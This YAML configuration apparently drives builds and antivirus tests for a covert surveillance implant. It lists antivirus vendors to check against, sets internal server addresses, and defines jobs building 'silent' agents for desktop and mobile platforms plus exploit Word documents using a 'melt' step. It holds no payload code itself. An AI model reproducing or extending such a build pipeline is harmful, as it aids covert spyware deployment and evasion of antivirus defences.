# -------------- SET -------------- #

SET_BLACKLIST:
    - SET:
        blacklist: [bitdef,comodo,gdata,drweb,emsisoft,sophos,360cn,kis32,avg,avg32]

SET_SERVERS:
    - SET:
        backend: 192.168.100.201
        frontend: 172.20.100.204

SET_DEFAULTS:
    - CALL: SET_BLACKLIST
    - CALL: SET_BUILD_PARAMS # defined in build_params.yaml
    - CALL: SET_SERVERS

SET_DEFAULTS_FUNCTIONAL:
    - CALL: SET_BLACKLIST
    - CALL: SET_BUILD_PARAMS # defined in build_params.yaml
    - SET:
        backend: 192.168.100.201
        frontend: 192.168.100.204

# -------------- BUILD -------------- #
# Requires: START_AGENT

BUILD_ELITE:
    - CALL: SET_DEFAULTS
    - BUILD: [ pull, windows_elite, silent ]

BUILD_WINDOWS:
    - CALL: SET_DEFAULTS
    - PUSH: [ AVAgent/assets/avtest.swf ]
    - PUSH: [ AVAgent/assets/sqlite, AVAgent/assets/sqlite_mod, AVAgent/assets/codec, AVAgent/assets/codec_mod ]
    - CHECK_STATIC: [ AVAgent/assets/* ]
    - BUILD: [ pull, windows, silent ]

BUILD_DESKTOP:
    - CALL: SET_DEFAULTS
    - PUSH: [ AVAgent/assets/avtest.swf ]
    - PUSH: [ AVAgent/assets/sqlite, AVAgent/assets/sqlite_mod, AVAgent/assets/codec, AVAgent/assets/codec_mod ]
    - CHECK_STATIC: [ AVAgent/assets/* ]
    - BUILD: [ pull, windows, silent ]
    - BUILD: [ pull, osx, silent ]
    - BUILD: [ pull, linux, silent ]

BUILD_MOBILE:
    - CALL: SET_DEFAULTS
    - BUILD: [ pull, blackberry, silent ]
    - BUILD: [ pull, android, silent ]
    - BUILD: [ pull, ios, silent ]

BUILD_EXPLOIT:
    - PUSH: [ AVAgent/assets/avtest.swf, AVAgent/assets/melt*, AVAgent/assets/PMIEFuck-WinWord.dll ]
    - PUSH: [ AVAgent/assets/sqlite, AVAgent/assets/sqlite_mod, AVAgent/assets/codec, AVAgent/assets/codec_mod ]
    - CALL: SET_DEFAULTS
    - CALL: SET_BUILD_PARAMS_EXPLOIT
    #- BUILD: [ pull, exploit_web, melt ]
    #- BUILD: [ pull, exploit_ppsx, melt ]
    - BUILD: [ pull, exploit, melt ]
    - BUILD: [ pull, exploit_docx, melt ]